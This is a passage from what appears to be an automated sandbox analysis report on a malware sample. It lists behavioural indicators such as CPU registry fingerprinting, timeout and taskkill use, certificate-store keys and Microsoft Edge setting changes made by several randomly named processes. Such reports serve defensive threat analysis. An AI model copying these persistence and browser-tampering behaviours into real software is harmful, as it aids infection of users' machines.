RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Update Status RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 RUNDLL32.EXE Key enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor RUNDLL32.EXE Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 LQpkvFjI8aWyyhYArcEYGJhT.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\FeatureSet RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Configuration Data RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\VendorIdentifier RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Platform Specific Field 1 RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Platform Specific Field 1 RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\VendorIdentifier RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Previous Update Revision RUNDLL32.EXE Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\FeatureSet RUNDLL32.EXE Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 ep_w4UBkXtmsr5S8c_BCYuj9.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Identifier RUNDLL32.EXE Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Status RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString ep_w4UBkXtmsr5S8c_BCYuj9.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Status RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\VendorIdentifier RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Configuration Data RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information RUNDLL32.EXE Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor RUNDLL32.EXE Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 RUNDLL32.EXE Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\FeatureSet RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Platform Specific Field 1 RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz RUNDLL32.EXE Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Update Status RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Configuration Data RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Update Status RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString runvd.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Previous Update Revision RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Status RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString RUNDLL32.EXE Key enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor RUNDLL32.EXE Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 RUNDLL32.EXE Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 runvd.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Configuration Data RUNDLL32.EXE Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 RUNDLL32.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Configuration Data RUNDLL32.EXE Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 RUNDLL32.EXE -
Delays execution with timeout.exe 3 IoCs
Processes:
timeout.exetimeout.exetimeout.exepid process 4460 timeout.exe 5332 timeout.exe 9076 timeout.exe -
Kills process with taskkill 6 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 2300 taskkill.exe 5988 taskkill.exe 6432 taskkill.exe 4428 taskkill.exe 6280 taskkill.exe 6500 taskkill.exe -
Modifies Control Panel 1 IoCs
Processes:
Esplorarne.exe.comdescription ioc process Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Control Panel\Colors Esplorarne.exe.com -
Processes:
rundll32.exeEsplorarne.exe.combrowser_broker.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\TypedURLs rundll32.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Main Esplorarne.exe.com Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Main browser_broker.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
mask_svc.exerejtRzn8M6moTkkzPiqh5X1M.exeEsplorarne.exe.comsvchost.exedescription ioc process Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2042 = "Eastern Standard Time (Mexico)" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-72 = "Newfoundland Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-435 = "Georgian Standard Time" mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs rejtRzn8M6moTkkzPiqh5X1M.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-11 = "Azores Daylight Time" rejtRzn8M6moTkkzPiqh5X1M.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs Esplorarne.exe.com Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-571 = "China Daylight Time" rejtRzn8M6moTkkzPiqh5X1M.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs rejtRzn8M6moTkkzPiqh5X1M.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-142 = "Canada Central Standard Time" rejtRzn8M6moTkkzPiqh5X1M.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2411 = "Marquesas Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-191 = "Mountain Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-562 = "SE Asia Standard Time" mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates rejtRzn8M6moTkkzPiqh5X1M.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-434 = "Georgian Daylight Time" rejtRzn8M6moTkkzPiqh5X1M.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates Esplorarne.exe.com Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-651 = "AUS Central Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-572 = "China Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2591 = "Tocantins Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-652 = "AUS Central Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-982 = "Kamchatka Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-131 = "US Eastern Daylight Time" mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs Esplorarne.exe.com Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-91 = "Pacific SA Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-212 = "Pacific Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-12 = "Azores Standard Time" rejtRzn8M6moTkkzPiqh5X1M.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs Esplorarne.exe.com Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust Esplorarne.exe.com Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2181 = "Astrakhan Daylight Time" mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs mask_svc.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-272 = "Greenwich Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-661 = "Cen. Australia Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-382 = "South Africa Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2571 = "Turks and Caicos Daylight Time" mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1972 = "Belarus Standard Time" mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-661 = "Cen. Australia Daylight Time" rejtRzn8M6moTkkzPiqh5X1M.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-981 = "Kamchatka Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-872 = "Pakistan Standard Time" mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-671 = "AUS Eastern Daylight Time" rejtRzn8M6moTkkzPiqh5X1M.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs Esplorarne.exe.com Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1022 = "Bangladesh Standard Time" rejtRzn8M6moTkkzPiqh5X1M.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-452 = "Caucasus Standard Time" rejtRzn8M6moTkkzPiqh5X1M.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1842 = "Russia TZ 4 Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2841 = "Saratov Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2392 = "Aleutian Standard Time" rejtRzn8M6moTkkzPiqh5X1M.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-392 = "Arab Standard Time" rejtRzn8M6moTkkzPiqh5X1M.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-81 = "Atlantic Daylight Time" rejtRzn8M6moTkkzPiqh5X1M.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-162 = "Central Standard Time" rejtRzn8M6moTkkzPiqh5X1M.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-632 = "Tokyo Standard Time" mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust rejtRzn8M6moTkkzPiqh5X1M.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs Esplorarne.exe.com Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-142 = "Canada Central Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-451 = "Caucasus Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1801 = "Line Islands Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-214 = "Pacific Daylight Time (Mexico)" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-831 = "SA Eastern Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-572 = "China Standard Time" rejtRzn8M6moTkkzPiqh5X1M.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2612 = "Bougainville Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-342 = "Egypt Standard Time" mask_svc.exe -
Modifies registry class 64 IoCs
Processes:
Esplorarne.exe.comMicrosoftEdgeCP.exerundll32.exeEsplorarne.exe.comEsplorarne.exe.comEsplorarne.exe.comsvchost.exeEsplorarne.exe.comEsplorarne.exe.comMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeEsplorarne.exe.comMicrosoftEdgeCP.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\Favorites Esplorarne.exe.com Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3 Esplorarne.exe.com Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\TypedUrlsComplete = "1" Esplorarne.exe.com Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder Esplorarne.exe.com Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore Esplorarne.exe.com Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main Esplorarne.exe.com Set value (data) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = ea5f7ee08697d701 Esplorarne.exe.com Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\SharedCookie_MRACMigrationDone = "1" Esplorarne.exe.com Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionHigh = "268435456" Esplorarne.exe.com Set value (data) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 633d8c198797d701 Esplorarne.exe.com Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{62FM2EJ3-714D-A09D-WM25-6QFJ226I1FER} rundll32.exe Set value (data) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration\MigrationTime = 1d24df8b702cd701 Esplorarne.exe.com Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\PrivacyAdvanced = "0" Esplorarne.exe.com Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListDOSTime = "0" Esplorarne.exe.com Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\CIPolicyState = "0" Esplorarne.exe.com Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus Esplorarne.exe.com Set value (data) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\SignaturePolicy = 06000000 Esplorarne.exe.com Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DataStore\OneTimeCleanup = "1" Esplorarne.exe.com Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{45AC2TN3-666M-M32E-TO40-1MIP137D5TOZ}\1 = "6108" svchost.exe Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url2 = "https://login.aliexpress.com/" Esplorarne.exe.com Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content Esplorarne.exe.com Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus Esplorarne.exe.com Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Roaming Esplorarne.exe.com Set value (data) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modif = 0100000054b10432c6da2ebdeaeb0bcb791792885c7c177bb989ef4093ad1e7b435e9bbde7f84626d924ac10c5aba082a4f23d7d138a13b227804c24ad69c1e1d8492f4fd3d46a3071b079863faa03fc0f1709c4c5bc06fb3a087543937291949f4eb1146e6626287a1ca2254706cc6fb124bdc8b034bfd9b3c002cbaae860e0c50cc8a374cc87d967093eeb8edec53819bb65377811e7185b4a29e2dbebdbb7ca23b6eebd278500c11759d46d543a74b77aac5e737310b04645bafb899bd7bad133f533339864959ae6aff8a986f2338f02ac1c497a14f8ed507d36ef18a6104cdc626a7d3d1c699d16ecb46496687c14f4595d9145c32d530de3d2ca82f00e65be654e9437b9120748f1e5aea29fd6cdee0b2ae8f64948c11a91b4fdf970b23a7997f5f2a6c62a461a713151cc64fe429249480dacc91cd01939f4bb9db8e656ad2af71bab8ed76a2d7263cd327ecfe87efb644b87a9d31fa92582908e50a26efa7a204a6493ac3021c5d50bf6fe088a5365d695a699ab96693dd998ec50ca77000bbbc7f2ccd2d296bcecad36d1dd24b202eaba2b891095fb4fc19ba69e8c81679317d314aaa3fc48 Esplorarne.exe.com Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CachePrefix = "Visited:" Esplorarne.exe.com Set value (data) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 6f7452dd8697d701 Esplorarne.exe.com Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{74WP1CM3-506M-V62R-WR42-7MQP227Y2YLP} rundll32.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery Esplorarne.exe.com Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History Esplorarne.exe.com Set value (data) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\MigrationTime = 1d24df8b702cd701 Esplorarne.exe.com Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\DetectPhoneNumberComplete = "1" Esplorarne.exe.com Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\TreeView = "1" Esplorarne.exe.com Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus Esplorarne.exe.com Key 